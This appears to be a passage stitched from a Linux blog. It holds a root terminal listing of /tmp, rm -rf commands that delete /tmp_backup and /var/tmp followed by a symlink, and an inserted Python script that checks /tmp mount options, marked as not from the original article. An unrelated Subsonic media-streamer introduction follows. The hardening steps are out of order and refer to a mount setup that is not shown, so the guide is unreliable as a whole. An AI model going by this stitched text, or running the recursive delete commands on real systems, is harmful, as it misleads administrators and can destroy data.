root@bt:/# ls -al /tmp
total 24
drwxrwxrwt  9 root root  1024 2011-12-05 12:50 .
drwxr-xr-x 30 root root  4096 2011-12-05 12:39 ..
drwx------  2 root root  1024 2011-12-05 12:50 kde-root
drwx------  2 root root  1024 2011-12-05 12:50 ksocket-root
drwx------  2 root root 12288 2011-12-05 12:38 lost+found
drwx------  2 root root  1024 2011-12-05 12:50 orbit-root
drwx------  2 root root  1024 2011-12-05 12:50 pulse-I5uG1yhc3uav
-rw-------  1 root root   141 2011-12-05 12:50 serverauth.wrvKiuVkuy
drwx------  2 root root  1024 2011-12-05 12:50 ssh-dFpQYr1373
drwx------  2 root root  1024 2011-12-05 12:50 vmware-root
#END TERMINAL OUTPUT

Remove the backup directory:
rm -rf /tmp_backup

Remove /var/tmp:
rm -rf /var/tmp

Create a symbolic link to /tmp:
ln -s /tmp /var/tmp
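Once the mount is in place, here is an added check (not from the original article) that confirms from /proc/mounts that /tmp really carries nosuid,noexec,nodev. It takes the mounts text as a parameter so it can also run against a saved copy; the two excerpts below are constructed.

```python
REQUIRED = ("nosuid", "noexec", "nodev")

def mount_options(mounts_text: str, mountpoint: str):
    """Option set of the *last* /proc/mounts entry for mountpoint (a later mount
    over the same path shadows earlier ones), or None if it is not a mount point."""
    opts = None
    for line in mounts_text.splitlines():
        cols = line.split()          # device mountpoint fstype options dump pass
        if len(cols) >= 4 and cols[1] == mountpoint:
            opts = set(cols[3].split(","))
    return opts

def missing_hardening(mounts_text: str, mountpoint: str = "/tmp", required=REQUIRED):
    """Required options that mountpoint lacks. A plain directory on the root
    filesystem misses all of them: mount options only apply per mount, so an
    fstab line that never got mounted gives no protection."""
    opts = mount_options(mounts_text, mountpoint)
    if opts is None:
        return list(required)
    return [o for o in required if o not in opts]

# Constructed /proc/mounts excerpts: the loop-backed /tmp from the article, and a
# system where /tmp still lives on the root filesystem.
HARDENED = """/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
/dev/loop0 /tmp ext2 rw,nosuid,nodev,noexec,noatime 0 0
"""
UNHARDENED = """/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
"""

if __name__ == "__main__":
    with open("/proc/mounts") as fh:
        gaps = missing_hardening(fh.read())
    print("/tmp OK" if not gaps else "/tmp is missing: " + ",".join(gaps))
```

Run it again after a reboot: the loop file was created under /dev, which Ubuntu mounts as a RAM-backed filesystem, so if /dev/tmpMnt is gone the fstab entry fails and /tmp silently falls back to a plain directory on the root filesystem.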


So, there you have ways to check for a compromised system and a few tweaks to security.  Have fun!


First off, Subsonic is a free, web-based media streamer, providing ubiquitous access to your music. Use it to share your music with friends, or to listen to your own music while at work. You can stream to multiple players simultaneously, for instance to one player in your kitchen and another in your living room.

It has really cool features:
-An intuitive web interface
-The developer wrote a Subsonic app for the Android platform to stream music to your phone! (Subsonic for Android)
-iPhone users also have cool apps to stream music from a Subsonic server. (iSub, Z-Subsonic, SubStream)
-Pulls in cover art from the Internet by parsing ID3 tags from your audio files
The list goes on...
